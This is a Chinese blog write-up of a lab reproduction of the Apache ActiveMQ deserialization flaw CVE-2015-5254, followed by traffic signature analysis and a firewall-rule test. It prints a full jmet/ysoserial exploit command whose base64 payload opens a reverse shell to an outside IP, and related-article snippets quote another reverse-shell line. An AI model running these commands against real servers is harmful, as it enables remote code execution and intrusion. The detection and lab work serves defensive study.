ActiveMQ 反序列化漏洞(CVE-2015-5254)特征分析

最新推荐文章于 2024-05-18 11:30:07 发布
最新推荐文章于 2024-05-18 11:30:07 发布
阅读量919 收藏
点赞数
分类专栏: 漏洞复现 文章标签: java-activemq activemq 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xhscxj/article/details/128027957
版权

介绍

Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。

Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。

复现

1.Vulhub搭建好后对8161端口主页面进行访问

 2.从github上下载jmetjar文件,并在同目录下创建一个external文件夹(否则可能会爆文件夹不存在的错误)。jmet原理是使用ysoserial生成Payload并发送(其jar内自带ysoserial,无需再自己下载),所以我们需要在ysoserialgadget中选择一个可以使用的,比如ROME

https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar

3.执行

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xODIuOTIuMy4xNTYvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}" -Yp ROME 192.168.130.161 61616

调用java -jar 运行 jmet的jar包,-Q是插入一个名为event的队列,-I 是选择装载ActiveMQ模块 -s 是选择ysoserial payload -Y 是攻击模式和内容 -Yp 是选择攻击利用链,这是选择是ROME, 之后带上IP加端口。

4.模拟管理员访问/admin/browse.jsp?JMSDestination=event 登录

登录后会看到请求

5.nc进行监听

6.当管理员点击后,会执行命令

 7.收到回话,反弹shell成功

 特征分析

1.抓取数据包查看tcp流

2.java -jar 运行 jmet的jar包时像服务器发送数据

需要 -I 来指定装载ActiveMQ模块,所以tcp流中会有ActiveMQ关键字

3.jmet原理是使用ysoserial生成Payload并发送,所以会有ysoserial/payloads关键字。

下面是执行的反弹shell的命令

 

综上所述:CVE-2015-5254特征为tcp流数据中包括 ActiveMQysoserial/payloads 关键字

规则测试

重新执行jmet

管理员这里并没有增加

防火墙成功拦截

 

 

深白色耳机
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ActiveMQ 反序列化漏洞 (CVE-2015-5254)
qq_32642035的博客
10-17 1225
ActiveMQ 反序列化漏洞 (CVE-2015-5254)漏洞复现
activemq_CVE-2015-5254_漏洞复现_源码分析
qq_51550750的博客
06-03 652
ActiveMQ-CVE-2015-5254
CVE-2015-5254复现学习
最新发布
shierbai的博客
05-18 461
使用[jmet](https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar)进行漏洞利用。影响版本:Apache ActiveMQ 5.13.0之前5.x版本,https://www.cvedetails.com/cve/CVE-2015-5254/实际环境下,需要诱导管理员点击我们构造的url去做访问,触发反弹条件。bash -i>/dev/tcp/攻击机ip/1234(监听端口) 0>&1。
ActiveMQ 反序列化漏洞CVE-2015-5254
黑白的博客
12-21 1317
声明 好好学习,天天向上 漏洞描述 Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。 CVE-2017-7504漏洞CVE-2015-7501的漏洞如出一辙,只是利用的路径稍微出现了变化,CVE-201
ActiveMQ 反序列化漏洞复现(CVE-2015-5254
浮生一世暖流年的博客
12-18 266
环境搭建 使用vulhub搭建环境,docker-compose up -d 环境搭建以后,开始监听8161和61616两个端口,其中8161是web管理端的端口,61616是工作端口。 复现过程 构造(可以使用ysoserial)可执行命令的序列化对象 作为一个消息,发送给目标61616端口 访问web管理页面,读取消息,触发漏洞 生成序列化对象 使用jmt生成,在同目录下创建一个external文件夹,不然可能报文件不存在错误。 java -jar jmet-0.1.0-all.jar
ActiveMQ反序列化漏洞CVE-2015-5254
chaojixiaojingang
01-22 473
1.漏洞描述 Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring Framework等。该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。 2.影响版本 Apache ActiveMQ 5.13.0之前5.x版本 3.漏洞环境搭建 靶机:安装daocker环境centos7: 192.168....
ActiveMQ 反序列化漏洞CVE-2015-5254)利用工具
08-15
2015年,ActiveMQ被发现存在一个严重的安全漏洞,被称为CVE-2015-5254,这是一个反序列化漏洞,允许攻击者通过精心构造的恶意消息来执行任意代码,从而对目标系统造成重大威胁。 反序列化漏洞通常发生在对象从...
ActiveMQ反序列化漏洞CVE-2015-5254漏洞利用工具
11-25
ActiveMQ反序列化漏洞CVE-2015-5254漏洞利用工具,说明文档已存在请进行查看
activemq-cpp-library-3.9.5 编译的windows库文件,支持vs2015、vs2017
07-21
ActiveMQ-CPP Library 3.9.5在Windows环境下的编译与应用》 ActiveMQ-CPP Library 3.9.5是一款专为C++开发者设计的、用于与Apache ActiveMQ集成的库,它提供了丰富的API接口,使得在C++环境中能够方便地发送和...
apache-activemq-5.16.5-bin.tar.gz 下载(5积分)
08-17
Apache ActiveMQ是Apache软件基金会的一个开源项目,是一个基于消息的通信中间件。ActiveMQ是JMS的一个具体实现,支持JMS的两种消息模型。ActiveMQ使用AMQP协议集成多平台应用,使用STOMP协议通过websockets在Web...
activemq-artemis-dynatrace-plugin:ActiveMQ Artemis经纪人流程的自定义Dynatrace JMX插件
05-03
Dynatrace的ActiveMQ Artemis插件关于经纪人流程的自定义 插件。Artemis概述插件该插件提供常规的代理统计信息,例如地址内存使用率,连接/用户数,总消息数,总消息添加/确认率。 Artemis Queues插件这提供了详细的...
CVE-2015-5254ActiveMQ 反序列化漏洞)复现
p_utao的博客
03-19 400
漏洞介绍 Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring Framework等。Apache ActiveMQ5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。 漏洞复现 http://10.7.10.41:8161/admin 默认账号密码:admin 登陆成功
ActiveMQ反序列化漏洞CVE-2015-5254复现
weixin_51387754的博客
06-19 415
ActiveMQ反序列化漏洞CVE-2015-5254)复现漏洞前言0x01 漏洞环境 漏洞前言 Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring Framework等。Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。 0x0
Vulhub漏洞ActiveMQ 反序列化任意命令执行漏洞 (CVE-2015-5254)
FryhRx的博客
03-29 4493
Vulhub漏洞ActiveMQ 反序列化任意命令执行漏洞 (CVE-2015-5254)
ActiveMQ 反序列化漏洞(CVE-2015-5254)
晚风不及你
03-15 235
漏洞编号 CVE-2015-5254 漏洞描述 Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。 漏洞影响 Apache ActiveMQ 5.x ~ 5.13.0 漏洞利用 1.vulhub使用dock
ActiveMQ CVE-2015-5254 分析
示例和笔记
06-07 305
ActiveMQ CVE-2015-5254漏洞是由于缺少对序列化数据的校验而导致,攻击者可以在序列化的数据中注入恶意代码。当 ActiveMQ 接收到该序列化数据并尝试反序列化时,将会执行这段恶意代码,从而实现攻击目的。具体来说,该漏洞的发生是由于 ActiveMQ 的两个缺陷导致。首先是方法中的缺陷,该方法将异常对象序列化为字节数组,这个字节数组包含了cause内的异常和message内的信息。攻击者可以构造精心设计的cause和message来注入恶意代码。接着,ActiveMQ 的与。
vulhub-activemq-CVE-2015-5254
weixin_43585088的博客
04-17 501
vulhub-activemq-CVE-2015-5254 ActiveMQ Apache ActiveMQ是Apache软件基金会所研发的开放源代码消息中间件 默认端口:8161 vulhub起容器 搭建的时候出了点问题,查了一下可能是net模式的dns有问题,sudo vim /etc/resolv.conf 去添加一些nameserver ERROR: Get https://registry-1.docker.io/v2/: dial tcp: lookup registry-1.docker.i
ActiveMQ 反序列化漏洞
08-19
ActiveMQ 反序列化漏洞是指在使用 ActiveMQ 进行消息传递时,由于未正确验证和过滤用户提交的数据,恶意攻击者可以利用该漏洞在目标系统上执行任意代码。这种漏洞通常是由于未正确配置 ActiveMQ 的序列化和反序列化...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值